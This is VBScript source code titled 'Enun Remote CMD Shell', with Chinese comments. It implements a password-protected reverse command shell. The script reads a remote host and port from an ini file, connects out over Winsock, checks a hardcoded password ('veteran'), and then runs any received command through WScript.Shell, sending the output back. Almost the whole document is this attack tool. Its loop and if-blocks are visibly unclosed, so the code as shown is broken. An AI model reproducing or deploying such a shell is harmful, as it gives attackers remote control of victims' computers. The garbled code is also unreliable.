VBScript Enun Remote CMD Shell代码
' enun remote cmdshell v 1.0
option explicit
const account_lock_time = 600000 '账户锁定时间,10分钟
const lockout_bad_count = 3 '密码失败次数
const default_wait_time = 1000 '默认延时,1秒
const default_time_out = 60000 '默认超时,60秒
public winsocket, srevdata, count
on error resume next
do while (winsocket.state <> 7)
dim objectfso, getconfig, line, host, port, i
set winsocket = wscript.createobject("mswinsock.winsock")
set objectfso = createobject("scripting.filesystemobject")
set getconfig = objectfso.opentextfile(".\enunrc.ini", 1)
for i = 1 to 3
line = getconfig.readline
if instr(line,"host") > 0 then host = split(line, "=", -1, 1)(1)
if instr(line,"port") > 0 then port = split(line, "=", -1, 1)(1)
if (len(host) = 0) then host = ""
if (len(port) = 0) then port = "8090"
winsocket.protocol = 0
winsocket.remotehost = host
winsocket.remoteport = port
wscript.sleep default_wait_time * 5
call trackscript(2, winsocket.state, winsocket.bytesreceived)
'setp: 2
do while (winsocket.state <> 9 and winsocket.state <> 0)
dim authkey, lockoutbadcount, timeout_m, timeout_n
timeout_n = 0
winsocket.senddata winsocket.localhostname & " is connected, enter password: "
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
timeout_n = timeout_n + 1000
call controltimeout(timeout_n)
winsocket.getdata authkey, vbstring
if split(authkey, chr(10), -1, 1)(0) = "veteran" then
winsocket.senddata "logon success, welcome!" & vbcrlf
srevdata = "veteran"
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
dim shellobj, executes
set shellobj = createobject("wscript.shell")
set executes = shellobj.exec(split(srevdata, chr(10), -1, 1)(0))
winsocket.senddata executes.stdout.readall
winsocket.senddata executes.stderr.readall
if (len(srevdata) > 0) then
timeout_m = 0
winsocket.senddata vbcrlf & "[" & winsocket.localhostname & "@enun]#: "
do while (winsocket.bytesreceived = 0 and winsocket.state <> 9 and winsocket.state <> 0)
timeout_m = timeout_m + 1000
call controltimeout(timeout_m)
end if
if (lcase(left(srevdata, 4)) = "exit") then winsocket.close
winsocket.getdata srevdata, vbstring
wscript.sleep default_wait_time
call trackscript(5, winsocket.state, winsocket.bytesreceived)
'setp: 5
lockoutbadcount = lockoutbadcount + 1
winsocket.senddata "logon fail: unknown user name or bad password." & vbcrlf
wscript.sleep default_wait_time
end if
if (lockoutbadcount = lockout_bad_count) then
winsocket.senddata "failed too many times, the account has been locked!" & vbcrlf
wscript.sleep default_wait_time
lockoutbadcount = 0
wscript.sleep account_lock_time
end if
call trackscript(3, winsocket.state, winsocket.bytesreceived)
'setp: 3
call trackscript(1, winsocket.state, winsocket.bytesreceived)
'setp: 1
'control timeout.
public sub controltimeout(count)
if count = default_time_out then
winsocket.senddata vbcrlf & "local server response timeout, please reconnect ..." & vbcrlf
wscript.sleep default_wait_time
wscript.sleep default_wait_time
end if
call trackscript(4, winsocket.state, winsocket.bytesreceived)
'setp: 4
end sub
'track script.
public sub trackscript(mystep, statecode, bytesreceived)
wscript.echo "mystep: " & mystep & ", statecode: " & statecode & ", received: " & bytesreceived & " bytes"
end sub